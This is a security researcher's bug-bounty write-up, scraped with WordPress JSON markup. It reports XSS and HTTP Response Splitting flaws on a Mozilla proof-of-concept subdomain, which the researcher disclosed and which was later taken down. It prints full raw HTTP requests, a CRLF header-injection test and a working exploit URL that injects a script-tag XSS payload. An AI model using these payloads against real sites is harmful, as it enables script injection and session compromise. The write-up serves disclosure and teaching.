This article illustrates the exploitation of an HRS<\/strong> (HTTP Response Splitting<\/em>) in order to elevate it in a reflected XSS through a concrete example: Mozilla<\/strong>.<\/p>\n When searching for vulnerable (sub)-domains as part of a Bug Bounty program, the subdomain dictionary attack phase can be successful. Beyond the known domains \/ subdomains that can be easily listed and discovered via search engines, dorks<\/em>, or OSINT<\/a> tools such as “the harvester<\/a>“, some subdomains may remain hidden, non-indexed and “unknown”.<\/p>\n This is precisely the case for the subdomain victim of the few vulnerabilities detailed later: chimein.mozilla.org<\/strong>. This domain, which was not indexed to common search engines and was neither “cited” nor “linked” anywhere, was discovered by a subbrute<\/strong><\/a> (brute-force of subdomains) by chance.<\/p>\n This domain had a seemingly poor design (understand that it seemed to host a draft web application, or a PoC).<\/p>\n Chimein.mozilla.org<\/p><\/div>\n A list of registered users as well as a very basic registration \/ login form were present: without any frills nor CSS. By entering an arbitrary account in order to register, I was able to register and authenticate myself on this web application of which I had not yet determined its usefulness:<\/p>\n Note<\/strong>: A passphrase in addition to a password? Will I encounter a notion of asymmetric encryption and certificates after registration and authentication?<\/p>\n Once registered and authenticated, the interest of this web application became clear: a form to send messages (encrypted) to other registered members became visible, as well as of course the list of my “own” messages received:<\/p>\n Message form<\/p><\/div>\n The application worked quite well: once registered, a bi-key was generated on the server side and each message sent from one user to another was protected by asymmetric encryption using these certificates coupled with the specified passphrase.<\/p>\n The “very precarious” side of the design and appearance of the application made me think of a proof-of-concept Mozilla, “forgotten” on a subdomain not referenced yet in the beta stage. I love this kind of target (very rare nowadays), on which I ran out my tests.<\/p>\n The very “simple” and “proof-of-concept” side of the application prompted me to test the server-side processing and clean-up of the user inputs: no sanitization<\/strong>.<\/p>\n The fields were vulnerable to Cross-Site Scripting<\/strong> vulnerabilities.<\/p>\n The login field, which was immediately reflected when authenticated in the “logged in as [login]<\/strong><\/em>” message, was vulnerable to a standard XSS injection:<\/p>\n Login injection<\/p><\/div>\n Once authenticated, the reflection was triggered:<\/p>\n Login reflection<\/p><\/div>\n But this XSS (Self) was only slightly critical …<\/p>\n More interesting: the body of the messages sent to the various recipients was also vulnerable. The messages were encrypted (via the bi-key \/ passphrase), so the XSS payload was stored encrypted by the application.<\/p>\n XSS payload in body<\/p><\/div>\n Once received by the user-victim, the user would consult the victim after having indicated the associated passphrase:<\/p>\n Passphrase<\/p><\/div>\n And the payload, once deciphered, was triggered …<\/p>\n Stored XSS fired !<\/p><\/div>\n More interesting than the first (Self-) XSS, this encrypted Stored-XSS gained criticality but still required actions of the potential victim (connect, choose the malicious message, indicate the passphrase, etc.).<\/p>\n HTTP Response Splitting (HRS) is an injection technique at the headers in response from the server. The principle is to forge \/ modify the headers of a server response from a client request containing arbitrary data. The OWASP<\/a> describes this attack like this:<\/p>\n HTTP response splitting occurs when:<\/p>\n HTTP response splitting is a means to an end, not an end in itself. At its root, the attack is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.<\/p>\n To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \\r) and LF (line feed, also given by %0a or \\n)characters into the header AND the underlying platform must be vulnerable to the injection of such characters. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control.<\/p><\/blockquote>\n The application operated via an API and several entry-points. For example, to create a new message, the entry-point “\/message\/create<\/strong>” was used. To list the received messages it was “\/message\/list<\/strong>” and to consult a message “\/message\/get<\/strong>” with the ID of the message transmitted in JSON-POST via a query of type:<\/p>\n The response associated with the ID 57 message was:<\/p>\n We note the presence of several cryptographic features in this response, including signature, IV, key, etc. Inducing that the decryption was done on the client side.<\/p>\n GET message ID<\/p><\/div>\n When attempting to inject a non-existent or badly formatted ID, the server would return an error code 500<\/strong> with the ID in question reflected in the error code message:<\/p>\n ID reflection in header<\/p><\/div>\n From this reflection, we\u00a0test the injection of the traditional \\r\\n<\/strong> url-encoded, namely %0a%0d<\/strong>:<\/p>\n Response:<\/p>\n HTTP Response Splitting delected<\/p><\/div>\n Bingo<\/strong>! Our arbitrary headers are present in the server response!<\/p>\n Via this confirmed HRS allowing us to inject and generate arbitrary headers in the response of the server, the idea will be to create our own HTML response that will be interpreted in the browser (we generate our own XSS).<\/p>\n To achieve this, we need several headers to inject as well as content (the XSS), for example:<\/p>\n Note<\/strong>: the parameters were interpreted both in POST and GET.<\/p>\n This resulted in the following injection:<\/p>\n HRS to XSS<\/p><\/div>\n XSS fired!<\/strong> We exploited HTTP Response Splitting<\/strong> to raise the header injection to produce an XSS<\/strong>. It is triggered as soon as the page is loaded.<\/p>\n Following the discovery of these various vulnerabilities targeting different entry points of the application, two tickets on the BugZilla Security \/ Bug Bounty of Mozilla were opened:<\/p>\n This domain, unfortunately not one of those eligible for the bounty of Mozilla, was detached from the DNS entry “chimein.mozilla.org” and was therefore no longer attached to the Mozilla project within 24 hours.<\/p>\n A few weeks \/ months later, this Secure Messaging PoC was no longer accessible at all (even via the server’s IP).<\/p>\n The vulnerabilities have therefore not been corrected (it was only a PoC after all), the subdomain was simply deleted preventing new access. It is a drastic method, certainly, but functional to mitigate\u00a0the vulnerabilities :)!<\/p>\n In any case, I encourage all bug-hunters to scan non-referenced subdomains via tools like subbrute<\/strong><\/a>, in order to explore other perimeters that have certainly not yet been analyzed!<\/p>\n I thank Mozilla security teams for their friendliness, professionalism, both for the exchanges through tickets and via emails.<\/p>\n Thanks for the Hall of Fame<\/a>\u00a0too! \ud83d\ude42<\/p>\n Mozilla Hall of Fame<\/p><\/div>\n Sources & ressources :<\/strong><\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" A subdomain of Mozilla.org has several XSS vulnerabilities and an HTTP Response Splitting vulnerability. This article illustrates the exploitation of […]<\/p>\n","protected":false},"author":1337,"featured_media":2312,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[528,378,56,530,398,14],"tags":[],"class_list":["post-2310","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bugbounty","category-contributions","category-cryptologie","category-hrs","category-opensource","category-vuln-exploit-poc"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/2310","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=2310"}],"version-history":[{"count":17,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/2310\/revisions"}],"predecessor-version":[{"id":2343,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/2310\/revisions\/2343"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/2312"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=2310"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=2310"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=2310"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}Target description<\/h1>\n
![\"Chimein.mozilla.org\"](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_SXSS_001-294x300.png\")
<\/a>\n
![\"Message](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_SXSS_005-209x300.png\")
<\/a>Few XSS…<\/h1>\n
Reflected XSS<\/h2>\n
![\"Login](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_RXSS_001-300x160.png\")
<\/a>![\"Login](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_RXSS_002-300x214.png\")
<\/a>Stored XSS\u00a0encrypted<\/h2>\n
![\"XSS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_SXSS_002-246x300.png\")
<\/a>![\"Passphrase\"](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_SXSS_003-300x218.png\")
<\/a>![\"Stored](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_SXSS_004-300x218.png\")
<\/a>HTTP Response Splitting<\/h1>\n
\n
HRS detection<\/h2>\n
POST \/message\/get HTTP\/1.1\r\nHost: chimein.mozilla.org\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko\/20100101 Firefox\/49.0\r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\r\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 30\r\n\r\nlogin=ycam&password=ycam&id=57<\/pre>\n
HTTP\/1.1 200 OK\r\nContent-Type: application\/json\r\nContent-Length: 1525\r\nDate: Fri, 21 Oct 2016 00:05:14 GMT\r\nConnection: close\r\n\r\n{\"id\":57,\"sender\":\"ycam\",\"recipient\":\"ycam\",\"subject\":\"ycam\",\"subject_signature\":\"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\\r\\n\/PMRAbK6IZF9O9G+kOmy9a\/mSPY9L8yiFdwk8CXzW\/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\\r\\nWrux3wQrv5JptqEMC1Cj+atQQQ\/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\\r\\nKpy\/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7\/OQzvw5GUAS5nTG\/tU79kO7AlhQLTgjlL\\r\\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==\",\"body\":\"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B\/Qw+BxyCTgccngdRp7en7Zi+M\\r\\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK\",\"body_signature\":\"kFLh+gNR1Ow2zuxqRebnYmiB\/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\\r\\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc\/xOe8GFX62z78pAPJfZ4tLyg8p\\r\\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\\r\\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\\r\\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==\",\"session_key\":\"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8\/1XWWolhPn1fRmf4j9ybmo\\r\\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\\r\\nTxVPIcT\/vLbjTA0hrnzmm\/tiyq31YPVOYq3Di95urw38DFJIRPKiP\/cJ0GoWkUrcB6OK8lCfvx0K\\r\\nWsS+PpAB\/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\\r\\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==\",\"session_key_iv\":\"zOtfAHFpmaW+hm2xcJhPxw==\",\"status\":\"read\",\"sent_date\":\"2016-10-20T23:05:30.009Z\",\"retrieved_date\":\"2016-10-20T23:06:45.811Z\",\"read_date\":\"2016-10-20T23:06:48.066Z\"}<\/pre>\n![\"GET](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_HRS_001-300x163.png\")
<\/a>HTTP\/1.1 500 message xxx does not exist\r\nDate: Fri, 21 Oct 2016 00:07:11 GMT\r\nConnection: close\r\nContent-Length: 0<\/pre>\n
![\"ID](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_HRS_004-300x96.png\")
<\/a>POST \/message\/get HTTP\/1.1\r\nHost: chimein.mozilla.org\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko\/20100101 Firefox\/49.0\r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\r\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 55\r\n\r\nlogin=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d<\/pre>\n
HTTP\/1.1 500 message xxx\r\nyyy\r\nzzz\r\n does not exist\r\nDate: Fri, 21 Oct 2016 00:08:40 GMT\r\nConnection: close\r\nContent-Length: 0<\/pre>\n
![\"HTTP](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_HRS_005-300x96.png\")
<\/a>Exploitation<\/h2>\n
\n
https:\/\/chimein.mozilla.org\/message\/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text\/html%0a%0d%0a%0d<html><body><script>alert(document.domain)<\/script><\/body><\/html><!--<\/pre>\n
![\"HRS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/20161021-Chimein.mozilla.org_HRS_006-300x105.png\")
<\/a>“Correction” and conclusion<\/h1>\n
\n
![\"Mozilla](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/hall_of_fame-300x267.png\")
<\/a>\n